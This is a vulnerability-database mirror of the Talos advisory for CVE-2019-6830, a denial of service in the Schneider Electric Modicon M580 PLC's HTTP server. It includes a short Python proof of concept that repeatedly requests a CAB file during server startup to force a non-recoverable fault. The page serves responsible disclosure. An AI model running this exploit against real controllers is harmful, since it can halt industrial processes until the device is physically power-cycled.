Search...

Schneider Electric Modicon M580 HTTP Request Denial of Service Vulnerability

2019-08-13T00:00:00

ID TALOS-2019-0808
Type talos
Reporter Talos Intelligence
Modified 2019-08-13T00:00:00

Description

Talos Vulnerability Report

TALOS-2019-0808

Schneider Electric Modicon M580 HTTP Request Denial of Service Vulnerability

August 13, 2019

CVE Number

CVE-2019-6830

Summary

An exploitable denial of service vulnerability exists in the HTTP request processing of the Schneider Electric Modicon M580 Programmable Automation Controller firmware version SV2.70. An appropriately timed HTTP request can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.

Tested Versions

Schneider Electric Modicon M580 BMEP582040 SV2.70

Product URLs

<https://www.schneider-electric.com/en/work/campaign/m580-epac/>

CVSSv3 Score

5.9 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-248: Uncaught Exception

Details

The Modicon M580 is the latest in Schneider Electric’s Modicon line of Programmable Automation Controllers. The device boasts a Wurldtech Achilles Level 2 certification and global policy controls to quickly enforce various security configurations. Communication with the device is possible over FTP, TFTP, HTTP, SNMP, EtherNet/IP, Modbus, and a management protocol referred to as UMAS.

When a HTTP request to an existing resource is sent during the intialization process of the device’s HTTP server, it is possible to make the device enter a non-recoverable fault state, causing a denial of service condition.

In the non-recoverable fault state the CPU has entered an error mode where all remote communications have been stopped, process logic stops execution, and the device requires a physical power cycle to regain functionality.

Exploit Proof of Concept

import requests
from time import sleep

def main():
    rhost = "192.168.10.1"
    uri = "http://%s/cabs/RdePocket.CAB" % (rhost)
    max_tries = 100
    results = []
    for i in xrange(max_tries):
        try:
            res = requests.get(uri, timeout=10)
            results.append(res)
        except:
            sleep(0.1)

if __name__ == '__main__':
    main()

Timeline

2019-04-10 - Vendor Disclosure 2019-08-13 - Vendor Patched; Public Release

Credit

Discovered by Jared Rittle of Cisco Talos.

Vulnerability Reports Next Report

TALOS-2018-0736

Previous Report

TALOS-2019-0807

JSON Vulners Source

Initial Source

{"id": "TALOS-2019-0808", "bulletinFamily": "info", "title": "Schneider Electric Modicon M580 HTTP Request Denial of Service Vulnerability", "description": "# Talos Vulnerability Report\n\n### TALOS-2019-0808\n\n## Schneider Electric Modicon M580 HTTP Request Denial of Service Vulnerability\n\n##### August 13, 2019\n\n##### CVE Number\n\nCVE-2019-6830\n\n### Summary\n\nAn exploitable denial of service vulnerability exists in the HTTP request processing of the Schneider Electric Modicon M580 Programmable Automation Controller firmware version SV2.70. An appropriately timed HTTP request can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.\n\n### Tested Versions\n\nSchneider Electric Modicon M580 BMEP582040 SV2.70\n\n### Product URLs\n\n<https://www.schneider-electric.com/en/work/campaign/m580-epac/>\n\n### CVSSv3 Score\n\n5.9 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H\n\n### CWE\n\nCWE-248: Uncaught Exception\n\n### Details\n\nThe Modicon M580 is the latest in Schneider Electric\u2019s Modicon line of Programmable Automation Controllers. The device boasts a Wurldtech Achilles Level 2 certification and global policy controls to quickly enforce various security configurations. Communication with the device is possible over FTP, TFTP, HTTP, SNMP, EtherNet/IP, Modbus, and a management protocol referred to as UMAS.\n\nWhen a HTTP request to an existing resource is sent during the intialization process of the device\u2019s HTTP server, it is possible to make the device enter a non-recoverable fault state, causing a denial of service condition.\n\nIn the non-recoverable fault state the CPU has entered an error mode where all remote communications have been stopped, process logic stops execution, and the device requires a physical power cycle to regain functionality.\n\n### Exploit Proof of Concept\n \n \n import requests\n from time import sleep\n \n def main():\n rhost = \"192.168.10.1\"\n uri = \"http://%s/cabs/RdePocket.CAB\" % (rhost)\n max_tries = 100\n results = []\n for i in xrange(max_tries):\n try:\n res = requests.get(uri, timeout=10)\n results.append(res)\n except:\n sleep(0.1)\n \n if __name__ == '__main__':\n main()\n \n\n### Timeline\n\n2019-04-10 - Vendor Disclosure 2019-08-13 - Vendor Patched; Public Release\n\n##### Credit\n\nDiscovered by Jared Rittle of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2018-0736\n\nPrevious Report\n\nTALOS-2019-0807\n", "published": "2019-08-13T00:00:00", "modified": "2019-08-13T00:00:00", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0808", "reporter": "Talos Intelligence", "references": [], "cvelist": ["CVE-2019-6830"], "type": "talos", "lastseen": "2020-07-01T21:25:16", "edition": 3, "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-6830"]}], "modified": "2020-07-01T21:25:16", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2020-07-01T21:25:16", "rev": 2}, "vulnersScore": 6.8}, "scheme": null}

{"cve": [{"lastseen": "2020-12-09T21:41:56", "description": "A CWE-248: Uncaught Exception vulnerability exists IN Modicon M580 all versions prior to V2.80, which could cause a possible denial of service when sending an appropriately timed HTTP request to the controller.", "edition": 8, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-09-17T20:15:00", "title": "CVE-2019-6830", "type": "cve", "cwe": ["CWE-755"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-6830"], "modified": "2019-10-09T23:51:00", "cpe": [], "id": "CVE-2019-6830", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6830", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, "cpe23": []}]}